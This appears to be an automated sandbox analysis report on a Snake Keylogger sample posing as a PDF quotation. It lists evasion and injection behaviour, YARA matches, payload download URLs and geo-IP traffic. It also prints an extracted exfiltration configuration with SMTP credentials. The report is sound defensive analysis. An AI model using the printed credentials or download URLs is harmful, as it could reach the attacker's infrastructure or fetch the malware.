Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe

Overview

General Information

Sample name:QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
renamed because original name is a hash value
Original sample name:QUOTATION_NOVQTRA071244PDF.scr.exe
Analysis ID:1560140
MD5:c62fb9bd9189ed019db81d5cec1ee11b
SHA1:1eda85cc204de90b33edddb1d8dfdf59a3dae847
SHA256:9c891264b004f469657e84658ba1d82d2365d9a76cfe7e18cefb2a8e0ccdb1a3
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe" MD5: C62FB9BD9189ED019DB81D5CEC1EE11B)
    • aspnet_compiler.exe (PID: 6176 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)
      • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "abbgets@qlststv.com", "Password": "ABBjy5ce)hyxmj99w", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2638636004.000001195F083000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x2b80:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x60b6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x1b692:$a1: get_encryptedPassword
      • 0x1b97e:$a2: get_encryptedUsername
      • 0x1b49e:$a3: get_timePasswordChanged
      • 0x1b599:$a4: get_passwordField
      • 0x1b6a8:$a5: set_encryptedPassword
      • 0x1cc9c:$a7: get_logins
      • 0x1cbff:$a10: KeyLoggerEventArgs
      • 0x1c898:$a11: KeyLoggerEventArgsEventHandler
      00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x1efbc:$x1: $%SMTPDV$
      • 0x1f022:$x2: $#TheHashHere%&
      • 0x20651:$x3: %FTPDV$
      • 0x2073b:$x4: $%TelegramDv$
      • 0x1c898:$x5: KeyLoggerEventArgs
      • 0x1cbff:$x5: KeyLoggerEventArgs
      • 0x20675:$m2: Clipboard Logs ID
      • 0x2088b:$m2: Screenshot Logs ID
      • 0x2099b:$m2: keystroke Logs ID
      • 0x20c75:$m3: SnakePW
      • 0x20863:$m4: \SnakeKeylogger\
      Click to see the 18 entries
      SourceRuleDescriptionAuthorStrings
      0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.119775b0000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        0.2.QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe.1196edbfa50.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          4.2.aspnet_compiler.exe.1f5af9900e8.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.aspnet_compiler.exe.1f5af9900e8.1.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              4.2.aspnet_compiler.exe.1f5af9900e8.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x127aa:$a1: get_encryptedPassword
              • 0x12a96:$a2: get_encryptedUsername
              • 0x125b6:$a3: get_timePasswordChanged
              • 0x126b1:$a4: get_passwordField
              • 0x127c0:$a5: set_encryptedPassword
              • 0x13db4:$a7: get_logins
              • 0x13d17:$a10: KeyLoggerEventArgs
              • 0x139b0:$a11: KeyLoggerEventArgsEventHandler
              Click to see the 21 entries

              System Summary

              barindex
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, ParentProcessId: 2132, ParentProcessName: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 6176, ProcessName: aspnet_compiler.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T13:09:03.727519+010028033053Unknown Traffic192.168.2.549822188.114.97.3443TCP
              2024-11-21T13:09:06.755451+010028033053Unknown Traffic192.168.2.549829188.114.97.3443TCP
              2024-11-21T13:09:18.683967+010028033053Unknown Traffic192.168.2.549862188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T13:08:58.651241+010028032742Potentially Bad Traffic192.168.2.549806193.122.130.080TCP
              2024-11-21T13:09:02.088850+010028032742Potentially Bad Traffic192.168.2.549806193.122.130.080TCP
              2024-11-21T13:09:05.088823+010028032742Potentially Bad Traffic192.168.2.549825193.122.130.080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "abbgets@qlststv.com", "Password": "ABBjy5ce)hyxmj99w", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeReversingLabs: Detection: 18%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49811 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EF9F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638577443.000001195EB30000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EBB1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EC01000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FF848FEA235h4_2_00007FF848FE9E4D
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FF848FE9C1Bh4_2_00007FF848FE99B0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeCode function: 4x nop then jmp 00007FF848FEA235h4_2_00007FF848FEA151
              Source: global trafficHTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/72vwG3nYeuAb HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49825 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49806 -> 193.122.130.0:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49829 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49822 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49862 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49811 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/72vwG3nYeuAb HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/u7ghXEYp/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: filetransfer.io
              Source: global trafficDNS traffic detected: DNS query: s24.filetransfer.io
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: aspnet_compiler.exe, 00000004.00000002.3322566875.000001F5B82E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros1
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io/data-package/u7ghXEYp/download
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC4F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/u7ghXEYp/download
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
              Source: aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75p
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s24.filetransfer.io
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBFA000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s24.filetransfer.io/storage/download/72vwG3nYeuAb
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
